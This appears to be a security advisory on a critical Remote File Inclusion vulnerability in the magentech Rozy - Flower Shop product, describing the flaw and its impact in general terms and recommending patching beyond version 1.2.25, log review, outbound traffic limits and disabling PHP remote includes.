A critical vulnerability has been identified in the magentech Rozy - Flower Shop product, which could allow an unauthenticated remote attacker to execute arbitrary code on the server. Successful exploitation of this vulnerability would lead to a complete compromise of the affected system, enabling an attacker to steal sensitive data, disrupt services, or use the server for further malicious activities. Due to the critical severity and ease of exploitation, immediate remediation is strongly recommended.

The vulnerability is an Improper Control of a Filename for an Include/Require Statement, commonly known as Remote File Inclusion (RFI). The application fails to properly sanitize user-supplied input that is later used in a PHP include or require statement. An unauthenticated remote attacker can exploit this by crafting a request that points to a malicious PHP file hosted on an external server. The vulnerable application will then fetch, include, and execute this remote file, giving the attacker full control over the web server with the privileges of the web service account.

This vulnerability is rated as critical severity with a CVSS score of 9.8. A successful exploit would result in a complete compromise of the confidentiality, integrity, and availability of the affected server. Potential consequences include the theft of sensitive customer data, payment card information, and intellectual property. An attacker could also deface the website, install ransomware, or use the compromised server as a pivot point to attack other systems within the internal network, leading to significant financial loss, operational disruption, and severe reputational damage.

Immediate Action: Immediately update the magentech Rozy - Flower Shop product to the latest version available from the vendor, which should be a version higher than 1.2.25. After patching, it is crucial to monitor for any signs of ongoing or previous exploitation attempts by thoroughly reviewing web server access logs and system logs for suspicious activity.

Proactive Monitoring: Review web server access logs for requests containing external URLs or unusual file path traversals (../) in request parameters. Monitor for unexpected outbound network connections from the web server, as this can be an indicator of a successful RFI exploit where the server is connecting to an attacker-controlled machine. Implement file integrity monitoring to detect unauthorized changes to web application files.

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

• Deploy a Web Application Firewall (WAF) with rules specifically designed to detect and block file inclusion attack patterns.
• In the server's php.ini configuration file, disable allow_url_include and allow_url_fopen to prevent PHP from including remote files.
• Restrict outbound network traffic from the web server to only known and trusted destinations.

Public Exploit Available: false

Given the critical CVSS score of 9.8 and the potential for complete system compromise, this vulnerability poses an immediate and severe risk to the organization. We strongly recommend that all instances of the affected magentech Rozy - Flower Shop product be patched immediately. Although this CVE is not currently listed on the CISA KEV catalog, its high severity and ease of exploitation make it a prime target for threat actors. Prioritize this patching activity above all other non-critical updates.